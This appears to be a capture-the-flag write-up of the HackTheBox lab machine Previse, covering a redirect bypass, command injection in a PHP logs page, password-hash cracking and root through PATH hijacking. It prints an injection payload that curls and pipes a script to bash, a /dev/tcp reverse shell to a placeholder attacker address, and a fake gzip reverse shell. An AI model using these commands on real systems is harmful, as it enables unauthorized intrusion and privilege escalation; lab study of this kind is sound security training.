HackTheBoxPentesting

HackTheBox: Previse

Eric Turner

Link: https://app.hackthebox.eu/machines/Previse

Enumeration

Port Scan

We have ssh open on port 22 and a web server on port 80.

Web Server

The web server takes us to a login page. Attempting to insert credentials will tell us Invalid Username or Password, so we will not be able to determine which part is wrong. Looking at the headers, we can also see this gives us a PHPSESSID cookie, so we are running some unknown version of PHP.

A gobuster scan just reveals the /css and /js directories with nothing interesting in them.

I attempted to do some directory traversal with ..%c0%af or %2e%2e%2f in place of ../ but neither worked.

I performed another gobuster scan for PHP files and found several:

One interesting file is nav.php. If we go to it, we can see a link for CREATE ACCOUNT

Clicking it just returns 302 back to the login page. I am going to try and intercept it with burp suite and see what we can do.

It turns out that the page loads in burp suite! If we change the 302 FOUND status code to 200 OK then it lets us stay on the page:

I created a new account with user/pass of admin / admin and logged in.

In the FILES tab, we can download a SITEBACKUP.ZIP which gives us the full source code for all the PHP pages. Many of which we found in our earlier gobuster scan.

I looked over the files, the most important ones seem to be the MySQL credentials found in config.php and also the logs.php.

Gaining Reverse Shell

snippet of code from logs.php

Now we can see the logs.php file takes a parameter supplied from POST and the parameter is not sanitized. We can use this to our advantage to escape the script and give us access.

I created a shell.sh file with the contents of sh -i >& /dev/tcp/my.ip.here/4444 0>&1 and started a nc listener using nc -lvnp 4444.

Next I spawned a python web server using python3 -m http.server in the same dir as the shell script.

Finally, exploit the POST request to curl the file and spawn it, like so: delim=tab%26curl+http://my.ip.here:8000/shell.sh|bash

This gives us a shell for www-data:

Browsing around, we can find a user.txt file in /home/m4lwhere, however the file is setup so only m4lwhere can read the file.

Now let’s take a step back and lay out what we know:

  • the website was created by m4lwhere
  • from the server status page we know there is one other admin.
  • From the logs page, we know the other admin is m4lwhere.
  • From the config.php we have the credentials to the mysql server
  • finally we have the salt from the accounts.php page: $1$🧂llol$

We will need to gain access to the mysql instance, grab the hashed password for m4lwhere , and then attempt to crack this password, hoping it is the same password used for his linux account as well.

Gaining Access to m4lwhere

From the official MySQL documentation, we can connect to the server locally using the syntax:

mysql --user=user_name --password="pass" db_name

so we can plug in the information from the config.php file and then we need to run some commands. First I ran show tables; to see what tables we have, then I selected all the info from the accounts table:

dump the password for m4lwhere from mysql

For some reason nothing would display unless I exited and then reconnected.

Next, I saved the hash to a file named pass.txt and loaded it into hashcat:

hashcat -a 0 -m 500 pass.txt  /usr/share/wordlists/rockyou.txt
  • -a 0: gives us a straight attack
  • -m 500 I compared the hash to this list of example hashes. the $1$ was the giveaway for md5crypt.
  • pass.txt this is the hashed password from the database
  • /usr/share/wordlists/rockyou.txt a very common wordlist installed by default on kali

After several minutes, we finally crack the hash!

I attempt to use this over ssh and it works! I went ahead and closed out the old netcat reverse shell since now we have credentials to access the box directly over ssh. Now we can grab the user.txt flag!

Privilege Escalation

Finally we need to gain root privileges for the final flag. First thing I like to do is see what we can run as sudo with sudo -l.

The only thing we can run is the /opt/scripts/access_backup.sh file:

The script does not specify /bin/gzip so we might be able to modify our path and copy /bin/bash to /gzip just to get it to load up a new gzip.

# first let's add our home directory to the front of the path
$ PATH=/home/m4lwhere:$PATH
$ export PATH

# now let's create a reverse shell disguised as gzip, one of the commands used in the above file we can run as root
# this is the same reverse shell code I used to first gain access to this box
$ echo "sh -i >& /dev/tcp/my.ip.here/4444 0>&1" > gzip
$ chmod +x gzip

# on our attacking machine, start back up a nc listener

$ nc -lvnp 4444

# back on the target machine, run the file with sudo. The path will first check our home directory for our custom gzip and run it
$ sudo /opt/scripts/access_backup.sh

# a connection should be made on the nc listener, run 
$ whoami
root

# grab the flag!
$ cat /root/root.txt
0750ebb5cc0e87b90dea8bcf0686e54b

Conclusion

Overall, the concepts of this box were not very difficult. The changing 302 Found to 200 OK was a clever trick that took me some searching to discover. Path injection and using the source code to do command injection were fairly straight forward. Fun box!

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.